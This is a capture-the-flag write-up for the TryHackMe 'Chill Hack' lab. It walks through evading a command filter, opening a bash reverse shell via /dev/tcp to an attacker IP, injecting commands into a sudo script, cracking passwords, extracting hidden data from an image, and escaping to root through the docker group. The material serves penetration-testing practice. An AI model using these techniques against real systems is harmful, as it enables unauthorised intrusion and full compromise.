Chill Hack — TryHackMe — WriteUp

TonyRahmos
6 min readDec 9, 2020

--

Hello. I’m Rahmos. Here is my Chill Hack — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -T4 -p- -v <ip>

nmap

There are 3 ports opened: 21(FTP), 22(SSH), and 80(HTTP).

As FTP allows anonymous login, I will see what’s inside first:

ftp <ip>

FTP

There’s only 1 file: note.txt, and it gives me some information:

1/ 2 names: Anurodh and Apaar

2/ Input filtering of “command”

I haven’t known what “command” here means. So just leave it there first. Next, access the website:

website

Such a well-designed website! I’ve checked the page source (Ctrl+U), but not found any valuable information. So let’s move to finding the hidden dirs using gobuster:

gobuster dir -u http://<ip>/ -w /path-to-wordlist

gobuster

An interesting dir: /secret. Let’s access it:

/secret

Well I can execute command here! Try with “ls -al”:

ls -al

Well it doesn’t execute my command but shows an alert. Let’s try “pwd”:

pwd

Hmm it executes this time. Take a look at the “note.txt’ above, I know that the command input here will be filtered and only allows specific command to be executed.

Let’s try bypass this filter. First, I’ll use “\” so the command will be “l\s -al”:

l\s -al

Oh it works! So now I’ll see the content of “index.php” using c\a\t:

c\a\t index.php

c\at index.php

View source:

index.php

Ok so now I know what commands are filtered. Many of them can be used to spawn a reverse shell. However, take a close look, the blacklisted list only contains the commands’ names, not their full path… What if I spawn a reverse shell using full path to command?

First, start a listener on your machine:

nc -lvnp 4444

Then, exec this command:

/bin/bash -c ‘/bin/bash -i >& /dev/tcp/<your-VPN-ip>/4444 0>&1’

reverse shell

And yes, the command has been executed and I’ve got the shell into the target! However, up to now, I cannot read anything inside users’ home due to permission:

So, let’s find a way to get higher priv. Spawn a tty shell using Python3:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

First, sudo -l to see if I can run sudo now:

sudo -l

Well I can run a script called “.helpline.sh” as apaar inside his home. Let’s execute it:

sudo -u apaar /home/apaar/.helpline.sh

Well not much happens. See the content of this script?

script content

Well so the “message” input will be passed right to the #!/bin/bash, which can be used to spawn a new shell for me as “apaar”. So let’s run this script again, but this time, input the msg as “/bin/bash”:

apaar shell

And now, I’m apaar! Again spawn a tty shell using the Python above. Let’s see the content of “local.txt’:

local.txt

It’ll be the 1st flag!

Now I’ll find a way to own root and get the final flag. First, sudo -l:

sudo -l

Looks like I cannot use sudo to priv esc to root as apaar. So I’ll find another way. Normally, a machine with webserver can highly be vulnerable to information leaked in “/var/www/”. Let’s cd to this folder to look for sensitive information.

/var/www

A folder “files” is inside.

files

hacker.php?

hacker.php

Look in the dark..? Hmm, let’s see the default page: index.php:

index.php

And yes, I’ve got the mysql credential! Let’s login to mysql:

mysql -u root -p

mysql login

It works! Move around the database and I’ve found a user’s hash password:

Let’s crack the password of “Anurodh” using this link:

I’ve tried to su anurodh with this password, but it doesn’t work. So it’s only used for the website.

Let’s find another way. cd images inside files to see what’s inside:

images

The image “hacker….jpg” looks suspicious. Transfer it to your machine and use steghide to see if there’s any hidden data:

steghide extract -sf hack….jpg

steghide

Oh there’s a backup.zip inside! Let’s unzip it and read the content.

However, I need a password to unzip this file. So let’s use “john” to bruteforce the password.

zip2john backup.zip > backupjohn.txt

john — wordlist=rockyou.txt backupjohn.txt

john

After a while john has cracked the password. Unzip again and read content of source_code.php:

source_code.php

Well I’ve found another password of Anurodh. Decode it from base64:

Now let’s su anurodh again with this password:

Now I’m anurodh! Look at the group, he’s in “docker” group. So that I can use docker command to priv esc to root:

docker run -v /:/mnt — rm -it alpine chroot /mnt sh

root shell

Now I’m root! Get the final flag inside root’s folder:

root flag

The end.

HAPPY HACKING

--

--

No responses yet